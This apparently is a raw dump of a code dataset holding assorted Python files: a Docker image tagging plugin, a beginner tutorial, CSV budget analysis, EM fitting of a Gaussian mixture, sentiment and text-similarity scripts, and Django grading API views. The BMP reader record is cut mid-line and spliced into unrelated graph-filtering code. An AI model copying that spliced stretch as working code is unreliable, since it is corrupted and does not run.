probability_ops(logits)\n label_indices = tf.argmax(input=labels, axis=1)\n loss = loss_op(labels, logits)\n\n return tf.estimator.EstimatorSpec(\n mode,\n loss=loss,\n eval_metric_ops={\n 'accuracy': tf.metrics.accuracy(label_indices, predicted_indices),\n 'auroc': tf.metrics.auc(labels, probabilities)\n })\n","sub_path":"charcnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"208687652","text":"\"\"\"\nCopyright (c) 2016 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\"\"\"\n\nimport os\nimport re\n\nfrom atomic_reactor.plugin import PostBuildPlugin\nfrom atomic_reactor.constants import INSPECT_CONFIG, TAG_NAME_REGEX\nfrom atomic_reactor.util import get_preferred_label_key\n\n\nclass TagFromConfigPlugin(PostBuildPlugin):\n \"\"\"\n Tags image with additional tags found in configuration file\n\n Configuration file must be named \"additional-tags\" and it must\n reside in repository as a sibling of Dockerfile. Each line in file\n is considered as a different tag to be applied. Empty lines and\n tag names containing hyphens are ignored. Tags will be prefixed by\n the value of Name label.\n\n For example, using the following configuration file:\n\n v1.0\n v1.0.1\n\n And assuming the Name label in Dockerfile is set to \"fedora\", the\n image will be tagged as:\n\n fedora:v1.0\n fedora:v1.0.1\n\n If configuration file is not found, this plugin takes no action.\n\n \"\"\"\n key = 'tag_from_config'\n is_allowed_to_fail = False\n\n TAGS_FILENAME = 'additional-tags'\n\n def get_tags(self):\n tags = []\n\n df_dir = self.workflow.source.get_dockerfile_path()[1]\n tags_filename = os.path.join(df_dir, self.TAGS_FILENAME)\n if not os.path.exists(tags_filename):\n self.log.debug('\"%s\" not found. '\n 'No additional tags will be applied.',\n tags_filename)\n return tags\n\n with open(tags_filename) as tags_file:\n for tag in tags_file:\n tag = tag.strip()\n tag_name_is_valid = re.match(TAG_NAME_REGEX, tag) is not None\n\n if tag_name_is_valid and '-' not in tag:\n tags.append(tag)\n else:\n self.log.warning(\"tag '%s' does not match '%s'\"\n \"or includes dashes, ignoring\", tag, TAG_NAME_REGEX)\n\n return tags\n\n def get_component_name(self):\n if not self.workflow.built_image_inspect:\n raise RuntimeError('There is no inspect data for built image. '\n 'Has the build succeeded?')\n\n try:\n labels = self.workflow.built_image_inspect[INSPECT_CONFIG]['Labels']\n name_label = str(get_preferred_label_key(labels, \"name\"))\n name = labels[name_label]\n except KeyError:\n self.log.error('Unable to determine \"name\" from \"Labels\"')\n raise\n\n return name\n\n def run(self):\n tags = self.get_tags()\n\n if tags:\n name = self.get_component_name()\n for i, tag_suffix in enumerate(tags):\n tag = '{}:{}'.format(name, tag_suffix)\n self.log.debug('Using additional tag: %s', tag)\n self.workflow.tag_conf.add_primary_image(tag)\n # Store modified name.\n tags[i] = tag\n\n return tags\n","sub_path":"atomic_reactor/plugins/post_tag_from_config.py","file_name":"post_tag_from_config.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"361371831","text":"\n# Aqui definimos uma função\ndef dizer_hello():\n print(\"Hello World\")\n\n# E a executamos dessa forma. Uma função que é definida e não é executada\n# não tem efeito no programa.\ndizer_hello()\n\n# Podemos executar a função diversas vezes\ndizer_hello()\ndizer_hello()\n\n# Essa função recebe dois parâmetros, que são usados internamente em sua execução\ndef imprimir_maior_numero(numero1, numero2):\n if numero1 > numero2:\n print(numero1)\n else:\n print(numero2)\n\n# Ao executar a função, é necessário informar os parâmetros\n# Note que o parâmetro numero1 recebe o valor de 10 e o numero2 recebe o valor\n# de 20, de acordo a ordem em que os valores foram passados.\nimprimir_maior_numero(10, 20) #imprime 20\n\nimprimir_maior_numero(5, 1) #imprime 5\n\n\n# Essa função retorna um valor após sua execução\ndef elevar_ao_quadrado(numero):\n return numero ** 2\n\n# O resultado retornado pela função é armazenado na variável resultado.\nresultado = elevar_ao_quadrado(5)\n\nprint(resultado) #imprime 25\n","sub_path":"02/exemplos/funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"257965175","text":"import socket\nimport json\n\nJSON_DATA = {\n \"command\": \"accept_connection\",\n \"login\": \"wiki\",\n \"token\": 13019580135609300876,\n \"friend_login\": \"pat\"\n}\n\nif __name__ == '__main__':\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.sendto(json.dumps(JSON_DATA).encode(), (\"localhost\", 2137))\n data, address = sock.recvfrom(1024)\n print(data)\n","sub_path":"Tests/accept_connection_json_test.py","file_name":"accept_connection_json_test.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"530566153","text":"# import data in csv file\nimport logging\nimport os\nimport csv\nfrom pprint import pprint\n\npath = os.path.join(\"Resources\", \"budget_data.csv\")\n\nwith open(path, \"r\") as file:\n # assumes reader API can handle files of size\n # if exceptions thrown, catch and confess\n try:\n dict_reader = csv.DictReader(file)\n except IOerror as e:\n logging.exception('')\n \n budget_dicts_list = [dict(ordered_dict) for ordered_dict in dict_reader]\n # throw error if no exception but still no data\n if not len(budget_dicts_list):\n raise ValueError('No data available')\n \n# data consistency check: check for duplicates\nfor month_dict in budget_dicts_list:\n multi = False\n visited_num = 0\n for inner_month_dict in budget_dicts_list:\n if inner_month_dict['Date'] == month_dict['Date']:\n visited_num += 1\n if visited_num > 1:\n multi = True\n\n \n# create new combined dict called budget_dict \nbudget_dict = {}\n# keeping ordered months as a separate list\nordered_months = []\nfor month_dict in budget_dicts_list:\n budget_dict[month_dict['Date']] = month_dict['Profit/Losses']\n ordered_months.append(month_dict['Date'])\n \n \n# get total number of months\ntot_months = len(budget_dict.keys())\n\nheader = \"Financial Analysis\"\nprint(header)\nprint(\"-\"*(len(header)+10))\nprint(f\"Total Months: {tot_months}\")\n\n\n# get net profit/loss\ntot_pnl = 0\nfor month_key in budget_dict:\n tot_pnl += int(budget_dict[month_key])\nprint(f\"Total: ${tot_pnl}\")\n\n\n# get average of the changes in \"Profit/Losses\" over the entire period\ncounter = 0\ndiffs_list = []\nfor row_dict in budget_dicts_list:\n if counter == 0:\n counter += 1\n continue\n diffs_list.append(int(row_dict['Profit/Losses']) - int(budget_dicts_list[counter - 1]['Profit/Losses']))\n counter += 1\n\navg_change = round((float(sum(diffs_list) / (tot_months - 1))), 2)\nprint(f\"Average Change: ${avg_change}\")\n\n\n# get greatest increase in profits \nmax_diff_index = diffs_list.index(max(diffs_list))\nprint(f\"Greatest Increase in Profits: {budget_dicts_list[max_diff_index + 1]['Date']} (${diffs_list[max_diff_index]})\")\n\n\n# get greatest decrease in profits\nmin_diff_index = diffs_list.index(min(diffs_list))\n# this should not go out of range since we are always skipping record 0\nprint(f\"Greatest Decrease in Profits: {budget_dicts_list[min_diff_index + 1]['Date']} (${diffs_list[min_diff_index]})\")\n\n\n# export results to text file\npybank_output_path = '/home/jupyter/python-challenge/PyBank/analysis/results.txt'\nwith open(pybank_output_path, 'a') as file:\n # print with pretty formatting\n file.write(header)\n file.write(\"\\n\")\n file.write(\"-\"*(len(header)+10))\n file.write(\"\\n\")\n file.write(f\"Total Months: {tot_months}\\n\")\n file.write(f\"Total: ${tot_pnl}\\n\")\n file.write(f\"Average Change: ${avg_change}\\n\")\n file.write(f\"Greatest Increase in Profits: {budget_dicts_list[max_diff_index + 1]['Date']} (${diffs_list[max_diff_index]})\\n\")\n file.write(f\"Greatest Decrease in Profits: {budget_dicts_list[min_diff_index + 1]['Date']} (${diffs_list[min_diff_index]})\") \n \n","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"253929165","text":"# -*- coding: UTF-8 -*-\nfrom struct import unpack, pack\n\n\n# 读取并存储 bmp 文件\nclass ReadBMPFile:\n def __init__(self, filePath):\n file = open(filePath, \"rb\")\n # 读取 bmp 文件的文件头 14 字节\n self.bfType = unpack(\"= num_max_iterations:\n break\n\n new_explore_set = set()\n\n # Visit all nodes on the explore list\n for node_id in explore_set:\n unvisited_nodes.remove(node_id)\n adjacent_node_ids = get_adjacent_node_ids(dmrs, node_id) - removed_nodes\n new_explore_set.update(adjacent_node_ids)\n\n # Explore set for the next iteration are the current explore set's adjacent nodes that have not been visited yet\n explore_set = new_explore_set & unvisited_nodes\n current_iter += 1\n\n return unvisited_nodes\n\n\ndef get_adjacent_node_ids(dmrs, node_id):\n \"\"\"\n Retrieve adjacent node ids (regardless of link direction) from the dmrs for node_id\n :param dmrs: DMRS object\n :param node_id: Node id string\n :return: Set of adjacent node id strings\n \"\"\"\n\n return {link.end for link in dmrs.get_out(node_id, itr=True)} | \\\n {link.start for link in dmrs.get_in(node_id, itr=True)}\n","sub_path":"pydmrs/simplification/gpred_filtering.py","file_name":"gpred_filtering.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"202054959","text":"import os\nfrom setuptools import setup\n\n# variables used in buildout\nhere = os.path.abspath(os.path.dirname(__file__))\ntry:\n README = open(os.path.join(here, 'README.md')).read()\nexcept:\n pass # don't know why this fails with tox\n\nrequires = [\n 'attrs',\n 'Pillow',\n 'py>=1.4.31',\n 'python-magic>=0.4.12',\n 'wheel>=0.24.0',\n 'xlrd',\n 'xlwt>=1.1.2',\n 'six',\n 'dcicutils>=0.5.3'\n]\n\ntests_require = [\n 'pytest>=3.0.1',\n 'pytest-mock',\n 'pytest-cov',\n 'tox>=2.5.0',\n]\n\nsetup(\n name='Submit4DN',\n version=open(\"wranglertools/_version.py\").readlines()[-1].split()[-1].strip(\"\\\"'\"),\n description='Tools for data wrangling and submission to data.4dnucleome.org',\n packages=['wranglertools'],\n zip_safe=False,\n author='4DN Team at Harvard Medical School',\n author_email='jeremy_johnson@hms.harvard.edu',\n url='http://data.4dnucleome.org',\n license='MIT',\n classifiers=[\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n ],\n install_requires=requires,\n include_package_data=True,\n tests_require=tests_require,\n extras_require={\n 'test': tests_require,\n },\n setup_requires=['pytest-runner', ],\n entry_points='''\n [console_scripts]\n import_data = wranglertools.import_data:main\n get_field_info = wranglertools.get_field_info:main\n ''',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"287754519","text":"import text2emotion as te\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport flair\n\nflair_sentiment = flair.models.TextClassifier.load('en-sentiment')\ntext = \"I'm furious\"\n\nsid = SentimentIntensityAnalyzer()\nres = sid.polarity_scores(text)\n# key, value = max(res.items(), key=lambda x: x[1])\n\ns = flair.data.Sentence(text)\nflair_sentiment.predict(s)\ntotal_sentiment = s.labels\n# key = total_sentiment[0].value\n# value = total_sentiment[0].score\n\nt2em = te.get_emotion(text)\nkey, value = max(t2em.items(), key=lambda x: x[1])\n\nmodel_dict = {}\nscore = res[\"compound\"]\nif score >= 0.05:\n model_dict[\"Vader\"] = {\"Emotion\": \"Positive\", 'Score': score}\nelif -0.05 < score < 0.05:\n model_dict[\"Vader\"] = {\"Emotion\": \"Neutral\", 'Score': score}\nelif score <= -0.05:\n model_dict[\"Vader\"] = {\"Emotion\": \"Negative\", 'Score': score}\n\nmodel_dict[\"Flair\"] = {\"Emotion\": str(total_sentiment[0].value).capitalize(), 'Score': total_sentiment[0].score}\nif value == 0:\n model_dict[\"Text2emotion\"] = {\"Emotion\": 'Neutral', 'Score': 1.00}\nelse:\n model_dict[\"Text2emotion\"] = {\"Emotion\": key, 'Score': value}\n\nprint(model_dict)\npos =0\nneg =0\nneu= 0\ntotposscore = 0\ntotnegscore = 0\ntotneuscore = 0\nfor item in model_dict.items():\n if item[1][\"Emotion\"] == \"Positive\" or item[1][\"Emotion\"] == \"Happy\" or item[1][\"Emotion\"] == \"Surprise\":\n pos+=1\n totposscore += item[1][\"Score\"]\n elif item[1][\"Emotion\"] == \"Negative\" or item[1][\"Emotion\"] == \"Angry\" or item[1][\"Emotion\"] == \"Sad\" or item[1][\"Emotion\"] == \"Fear\":\n neg+=1\n totnegscore += abs(item[1][\"Score\"])\n elif item[1][\"Emotion\"] == 'Neutral':\n neu+=1\n totneuscore = abs(item[1][\"Score\"])\nprint(\"Pos: {}, Neg: {}, Neu: {}, PosScore: {}, NegScore: {}\".format(pos,neg,neu,totposscore,totnegscore))\nprint(model_dict[\"Text2emotion\"][\"Emotion\"])\nif pos>=2:\n print(totposscore/pos)\nelif neg>=2:\n print(totnegscore/neg)\nelif neu>=2:\n print(totneuscore / neu)\nelse:\n print(model_dict[\"Text2emotion\"][\"Score\"])\n# print()\n# print(key)\n# print(value)\n","sub_path":"test/sentiment_test.py","file_name":"sentiment_test.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"421916863","text":"# -*- codeing: utf-8 -*-\r\nimport numpy as np\r\nfrom scipy.stats import norm\r\nimport matplotlib.pyplot as plt\r\n# from matplotlib.ticker import MultipleLocator\r\n\r\n# 参考:test_gmm.py\r\n# 混合数3, muとsigmaは関数内で適当に設定\r\ndef q4func_gmm(n, fill=0.0):\r\n x = np.zeros(n)\r\n g = np.random.randn(n)\r\n u = np.random.rand(n)\r\n mu = np.array([1.0, 3.0, 5.0])\r\n sigma = np.array([0.1, 0.3, 0.5])\r\n flag = (0 <= u) & (u < 1/3) \r\n x = (mu[0] + sigma[0]*g)*flag\r\n flag = (1/3 <= u) & (u < 2/3)\r\n x += (mu[1] + sigma[1]*g)*flag\r\n flag = (2/3 <= u) & (u <= 1)\r\n x += (mu[2] + sigma[2]*g)*flag\r\n return x\r\n\r\n# 参考:p118a.py, p118c.py\r\nn = 1000 # 標本数\r\nm = 5 # 混合数\r\nx = q4func_gmm(n)\r\n\r\nL = -np.inf\r\nw = np.ones(m)/m\r\nw = w.reshape(m,1) # 縦ベクトルにする\r\nmu = np.linspace( min(x), max(x), m) # 平均値の初期値\r\nmu = mu.reshape(m,1)\r\nsigma2 = np.ones(m)/10 # 分散の初期値\r\nsigma2 = sigma2.reshape(m,1)\r\n\r\nLt = L\r\nwt = w\r\nmut = mu\r\nsigma2t = sigma2\r\nt=0\r\ntt = np.array([0]) \r\n\r\nwhile 1:\r\n tmp1 = np.square(np.tile(x, (m,1)) - np.tile(mu, (1,n)))\r\n tmp2 = 2 * np.tile(sigma2, (1,n))\r\n tmp3 = np.tile(w, (1,n)) * np.exp(-tmp1 / tmp2) / np.sqrt(np.pi * tmp2)\r\n eta = tmp3 / np.tile(np.sum(tmp3, axis=0), (m,1))\r\n tmp4 = np.sum(eta, axis=1)\r\n w = tmp4 / n\r\n w = w.reshape(m, 1)\r\n mu = (eta.dot(x)) / tmp4\r\n mu = mu.reshape(m, 1)\r\n sigma2 = np.sum(tmp1*eta, axis=1) / tmp4\r\n sigma2 = sigma2.reshape(m,1)\r\n\r\n Lnew = np.sum(np.log(np.sum(tmp3,axis=0)))\r\n\r\n wt = np.append(wt,w, axis=1)\r\n mut = np.append(mut,mu, axis=1)\r\n sigma2t = np.append(sigma2t,sigma2, axis=1)\r\n\r\n if Lnew - L < 0.0001:\r\n break\r\n L = Lnew\r\n\r\n Lt = np.append(Lt,L)\r\n t = t+1\r\n tt = np.append(tt,t)\r\n\r\n# http://bicycle1885.hatenablog.com/entry/2014/02/14/023734\r\n# https://qiita.com/Tatejimaru137/items/50fb90dd52f194979a13\r\nfig, axs = plt.subplots(2, 2)\r\n\r\nxx = np.arange(0,7,0.01)\r\ny0 = norm.pdf(xx, mu[0], np.sqrt(sigma2[0])) # probability density function\r\ny1 = norm.pdf(xx, mu[1], np.sqrt(sigma2[1]))\r\ny2 = norm.pdf(xx, mu[2], np.sqrt(sigma2[2]))\r\ny3 = norm.pdf(xx, mu[3], np.sqrt(sigma2[3]))\r\ny4 = norm.pdf(xx, mu[4], np.sqrt(sigma2[4]))\r\ny = w[0] * y0 + w[1] * y1 + w[2] * y2 + w[3] * y3 + w[4] * y4\r\n\r\n# axs[0,0].hist(x, bins='auto', normed=True)\r\naxs[0,0].hist(x, bins=100, density=True)\r\naxs[0,0].plot(xx, y, color='r')\r\n# axs[0,0].plot(xx, y0, color='g')\r\n# axs[0,0].plot(xx, y1, color='b')\r\n# axs[0,0].plot(xx, y2, color='y')\r\n\r\n \r\naxs[0,1].plot(wt[0], label=\"w0\")\r\naxs[0,1].plot(wt[1], label=\"w1\")\r\naxs[0,1].plot(wt[2], label=\"w2\")\r\naxs[0,1].plot(wt[3], label=\"w3\")\r\naxs[0,1].plot(wt[4], label=\"w4\")\r\naxs[0,1].set_xlabel('time')\r\n# axs[0,1].set_ylabel('w0, w1, and w2')\r\naxs[0,1].grid(True)\r\n# axs[0,1].xaxis.set_major_locator(MultipleLocator(2)) # 整数で2ずつ\r\naxs[0,1].legend(bbox_to_anchor=(1, 1), loc='upper right')\r\n \r\n \r\naxs[1,0].plot(mut[0], label=\"mu0\")\r\naxs[1,0].plot(mut[1], label=\"mu1\")\r\naxs[1,0].plot(mut[2], label=\"mu2\")\r\naxs[1,0].plot(mut[3], label=\"mu3\")\r\naxs[1,0].plot(mut[4], label=\"mu4\")\r\naxs[1,0].set_xlabel('time')\r\n# axs[1,0].set_ylabel('mu0, mu1, and mu2')\r\naxs[1,0].grid(True)\r\n# axs[1,0].xaxis.set_major_locator(MultipleLocator(2))\r\naxs[1,0].legend(bbox_to_anchor=(1, 1), loc='upper right')\r\n \r\naxs[1,1].plot(np.sqrt(sigma2t[0]), label=\"sigma0\")\r\naxs[1,1].plot(np.sqrt(sigma2t[1]), label=\"sigma1\")\r\naxs[1,1].plot(np.sqrt(sigma2t[2]), label=\"sigma2\")\r\naxs[1,1].plot(np.sqrt(sigma2t[3]), label=\"sigma3\")\r\naxs[1,1].plot(np.sqrt(sigma2t[4]), label=\"sigma4\")\r\naxs[1,1].set_xlabel('time')\r\n# axs[1,1].set_ylabel('sigma0, 1, and 2')\r\naxs[1,1].grid(True)\r\n# axs[1,1].xaxis.set_major_locator(MultipleLocator(2))\r\naxs[1,1].legend(bbox_to_anchor=(1, 1), loc='upper right')\r\n\r\nfig.tight_layout() # 余白をそろえる\r\nplt.show()","sub_path":"gmm_mle/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"226917548","text":"# -*- encoding: utf-8 -*-\r\n'''\r\n@File : similarity.py\r\n@Author : ShareJing\r\n@Email : yymmjing@gmail.com\r\n@Desc : 文本相似度计算 (主函数)\r\n'''\r\n\r\nfrom utils import load_data\r\nfrom model import BM25Okapi\r\nfrom model import EditDistance\r\nfrom model import SentTranformers\r\n\r\n\r\ndef get_data(in_path):\r\n data = load_data(in_path)\r\n \r\n idx2number = {}\r\n number2data = {}\r\n corpus = [] # 用来计算文本相似度的文档集\r\n for idx, sample in enumerate(data):\r\n number = sample[\"number\"]\r\n product = sample[\"product\"]\r\n component = sample[\"component\"]\r\n abstract = sample[\"abstract\"]\r\n description = sample[\"description\"]\r\n recreation_procedure = sample[\"recreation_procedure\"]\r\n problem_isolation = sample[\"problem_isolation\"]\r\n\r\n full_data = {\"product\": product,\r\n \"component\": component,\r\n \"abstract\": abstract,\r\n \"description\": description}\r\n \r\n idx2number[idx] = number\r\n number2data[number] = full_data\r\n \r\n # 根据需求获取不同字段的数据\r\n sentence = sample[\"abstract\"] if sample[\"abstract\"] else sample[\"description\"]\r\n tokenized_sent = sentence.split(\" \") # 这里可以写一些自己需求的清洗函数\r\n corpus.append(tokenized_sent)\r\n\r\n return idx2number, number2data, corpus\r\n\r\n \r\nif __name__ == \"__main__\":\r\n\r\n print(\"正在加载数据......\")\r\n idx2number, number2data, corpus = get_data(\"data/processed_data.json\")\r\n\r\n # corpus = corpus[:100]\r\n \r\n #=======================\r\n # EditDistance(不适合英文句子,适合英文单词;中文句子适合)/BM25\r\n #=======================\r\n print(\"模型初始化中......\")\r\n ed = EditDistance(corpus)\r\n # bm25 = BM25Okapi(corpus)\r\n embedder = SentTranformers(\"paraphrase-distilroberta-base-v1\")\r\n \r\n for _ in range(1):\r\n print(\"---------------------------------\")\r\n # EditDistance\r\n # ed_query = input(\"请输入查询:\")\r\n # return_data = ed.get_top_n(ed_query, corpus, n=5)\r\n\r\n # BM25\r\n # bm25_tokenized_query = input(\"请输入查询:\").split(\" \")\r\n # return_data = bm25.get_top_n(bm25_tokenized_query, corpus, n=5)\r\n\r\n # Sentence Transformer\r\n st_query = input(\"请输入查询:\")\r\n return_data = embedder.get_top_n([st_query], corpus)\r\n\r\n for ele in return_data:\r\n number = idx2number[ele[\"idx\"]]\r\n similarity_data = \" \".join(ele[\"document\"])\r\n # similarity_full_data = number2data[number]\r\n \r\n print(\"number: \", number)\r\n print(\"similarity_data: \", similarity_data)\r\n print(\"\\n\")\r\n \r\n\r\n\r\n \r\n\r\n","sub_path":"similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"505993726","text":"import json\nfrom datetime import date\n\nimport django\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http.response import HttpResponse\n\nfrom core.decorators import enable_json\nfrom core.models import *\nfrom notifications.models import Notification, \\\n NewAchievementNotification, NewLectureNotification, NewMarkNotification, NewWorkNotification\n\n\ndate_handler = lambda obj: (\n obj.isoformat()\n if isinstance(obj, datetime)\n or isinstance(obj, date)\n else None)\n\n\n@login_required\ndef get_task_result_by_practice(request):\n if \"practice_id\" in request.GET:\n practice_id = request.GET.get(\"practice_id\")\n try:\n practice = Practice.objects.get(id=practice_id)\n\n student_list = []\n for user in User.objects.filter(attended_practices=practice_id):\n student_list.append(user_to_dict(user))\n\n work_list = []\n for work in Work.objects.filter(practice=practice).order_by('end_date'):\n work_dict = model_to_dict(work)\n work_dict['tasks'] = []\n for task in Task.objects.filter(work=work):\n work_dict['tasks'].append(model_to_dict(task))\n work_list.append(work_dict)\n\n mark_list = []\n for mark in Mark.objects.filter(task__work__practice=practice_id):\n mark_list.append(model_to_dict(mark))\n\n response = {'students': student_list,\n 'course': model_to_dict(practice),\n 'works': work_list,\n 'marks': mark_list}\n return HttpResponse(json.dumps(response, default=date_handler), content_type=\"application/json\")\n except ObjectDoesNotExist:\n return HttpResponse(status=404)\n else:\n return HttpResponse(status=400)\n\n\n@login_required\n@enable_json\ndef get_course_attendance(request, **kwargs):\n if \"course_id\" in request.GET:\n course_id = request.GET.get(\"course_id\")\n lecture_list = []\n for lecture in Lecture.objects.filter(course=course_id).order_by('date'):\n lect = model_to_dict(lecture)\n lect['date'] = str(lect['date'])\n lecture_list.append(lect)\n\n attendance_list = []\n for attendance in Attendance.objects.filter(lecture__course=course_id):\n attendance_list.append(model_to_dict(attendance))\n\n student_list = []\n for student in User.objects.filter(attended_courses=course_id):\n student_list.append(user_to_dict(student))\n\n response = {'attendance': attendance_list,\n 'lectures': lecture_list,\n 'students': student_list}\n return response\n else:\n return HttpResponse(status=400)\n\n\n@login_required\n@enable_json\ndef get_works_by_deadline(request, json_data=None):\n django.utils.translation.get_language()\n user = request.user\n deadline_list = []\n\n for deadline in Work.objects.filter(end_date__gte=date.today(), practice__students=user).order_by('end_date'):\n dl = model_to_dict(deadline)\n dl['course'] = deadline.practice.course.id\n dl['course_name'] = deadline.practice.course.name\n deadline_list.append(dl)\n\n return deadline_list\n\n\n@login_required\n@enable_json\ndef list_lectures(request, **kwargs):\n course_id = request.GET['course_id']\n lectures = []\n for lecture in Lecture.objects.filter(course=course_id):\n lectures.append(model_to_dict(lecture))\n return lectures\n\n\n@login_required\n@enable_json\ndef save_lecture(request, json_data=None):\n if not json_data:\n json_data = {}\n data = json_data\n if 'date' in data:\n data['date'] = datetime.fromtimestamp(data['date'] / 1000)\n course = Course.objects.get(id=data['course_id'])\n if course.teacher != request.user:\n return HttpResponse(status=403)\n if 'lecture_id' in data:\n lecture = Lecture.objects.get(id=data['lecture_id'])\n lecture.course = course\n if 'date' in data:\n lecture.date = data['date']\n lecture.link = data['link']\n lecture.save()\n return model_to_dict(lecture)\n else:\n lecture = Lecture(course=course, date=data['date'], link=data['link'])\n lecture.save()\n lecture.date = str(lecture.date)\n return model_to_dict(lecture)\n\n\n@login_required\ndef save_mark(request):\n try:\n data = json.loads(request.body)\n data['mark'] = float(data['mark'])\n task = Task.objects.get(id=data['task_id'])\n student = User.objects.get(id=data['student_id'])\n if task.work.practice.teacher != request.user:\n return HttpResponse(status=403)\n if data['mark'] > task.max_mark:\n return HttpResponse(status=400)\n mark, found = Mark.objects.get_or_create(task=task, student=student, defaults={'mark': data['mark']})\n mark.mark = data['mark']\n mark.save()\n return HttpResponse(status=200)\n except ObjectDoesNotExist:\n return HttpResponse(status=404)\n\n\n@login_required\ndef save_attendance(request):\n try:\n data = json.loads(request.body)\n lecture = Lecture.objects.get(id=data['lecture_id'])\n student = User.objects.get(id=data['student_id'])\n flag = data['flag']\n if lecture.course.teacher != request.user:\n return HttpResponse(status=403)\n (att, found) = Attendance.objects.get_or_create(lecture=lecture, student=student, defaults={'flag': flag})\n att.flag = flag\n att.save()\n return HttpResponse(status=200)\n except ObjectDoesNotExist:\n return HttpResponse(status=404)\n\n\n@login_required\n@enable_json\ndef save_work(request, json_data=None):\n data = json_data\n practice = Practice.objects.get(id=data['practice_id'])\n if practice.teacher != request.user:\n return HttpResponse(status=403)\n end_date = datetime.fromtimestamp(data['end_date'] / 1000)\n start_date = datetime.fromtimestamp(data['start_date'] / 1000)\n link = data['link']\n tasks = data['tasks']\n min_mark = 0\n max_mark = 0\n for task in tasks:\n min_mark += int(task['min'])\n max_mark += int(task['max'])\n\n work = Work.objects.create(\n end_date=end_date,\n start_date=start_date,\n link=link,\n practice=practice,\n required_mark=min_mark,\n max_mark=max_mark\n )\n work.save()\n work_dict = model_to_dict(work)\n work_dict['tasks'] = []\n for t in tasks:\n task = Task.objects.create(\n # required_mark=int(t['min']),\n max_mark=int(t['max']),\n work=work\n )\n task.save()\n work_dict['tasks'].append(model_to_dict(task))\n\n return work_dict\n\n\n@login_required\ndef get_notifications(request):\n user = request.user\n notifications = []\n\n for notification in NewAchievementNotification.objects.filter(related_user=user, viewed=False).order_by('time'):\n notifications.append({'id': notification.id,\n 'link': notification.related_link(),\n 'message': notification.__unicode__()})\n\n for notification in NewLectureNotification.objects.filter(related_user=user, viewed=False).order_by('time'):\n notifications.append({'id': notification.id,\n 'link': notification.related_link(),\n 'message': notification.__unicode__()})\n\n for notification in NewMarkNotification.objects.filter(related_user=user, viewed=False).order_by('time'):\n notifications.append({'id': notification.id,\n 'link': notification.related_link(),\n 'message': notification.__unicode__()})\n\n for notification in NewWorkNotification.objects.filter(related_user=user, viewed=False).order_by('time'):\n notifications.append({'id': notification.id,\n 'link': notification.related_link(),\n 'message': notification.__unicode__()})\n return HttpResponse(json.dumps(notifications), content_type=\"application/json\")\n\n\ndef user_to_dict(user):\n us = model_to_dict(user, fields=['id', 'first_name', 'last_name'])\n us['middle_name'] = user.userdata.middle_name\n return us\n\n\n@login_required\ndef view_notification(request):\n data = json.loads(request.body)\n notification = Notification.objects.get(id=data['id'])\n if notification.related_user == request.user:\n notification.viewed = True\n notification.save()\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=403)\n\n\ndef view_all_notification(request):\n for notification in Notification.objects.filter(related_user=request.user):\n notification.viewed = True\n notification.save()\n return HttpResponse(status=200)","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"608039993","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport datetime\nfrom sqlalchemy import create_engine, MetaData, inspect, Table, insert, select\nimport os\n\n\nDATABASE_URL = os.getenv(\"DATABASE_URL\")\n\n\n\n#Checks if the games being used in the prediction have had their pcntdiffs calculated and stored already\ndef loadPcntDiffData(gamesList):\n engine = create_engine(DATABASE_URL)\n sqlString='select * from pcntdiffstats where game_id in {}'.format(tuple(gamesList['game_id']))\n dataset = pd.read_sql(sqlString,engine)\n dataset.set_index('game_id', inplace=True)\n #Remove NaN values\n for i in dataset.isnull().any().index:\n if dataset.isnull().any()[i] == True:\n print('Nan values found in row',i,'. Replacing these NaNs with zero.')\n dataset[i].replace({np.nan:0},inplace=True)\n if len(dataset) == len(gamesList):\n return dataset\n else:\n raise\n\n\n\ndef AddBinaryVariablesForPred(dataset,binaryVariables={\"home_game\":False}):\n #Add other Variables\n #Handle Home game fixed var\n for var in binaryVariables:\n try:\n if binaryVariables[var]:\n dataset[var] = 1\n else:\n dataset[var] = 0\n except:\n print('ERROR Binary Variable Addition for',var)\n return dataset\n\ndef resultPredictor(model,data):\n print(pd.DataFrame(data).drop('result',axis=0).transpose())\n prediction = model.predict(pd.DataFrame(data).drop('result',axis=0).transpose())\n 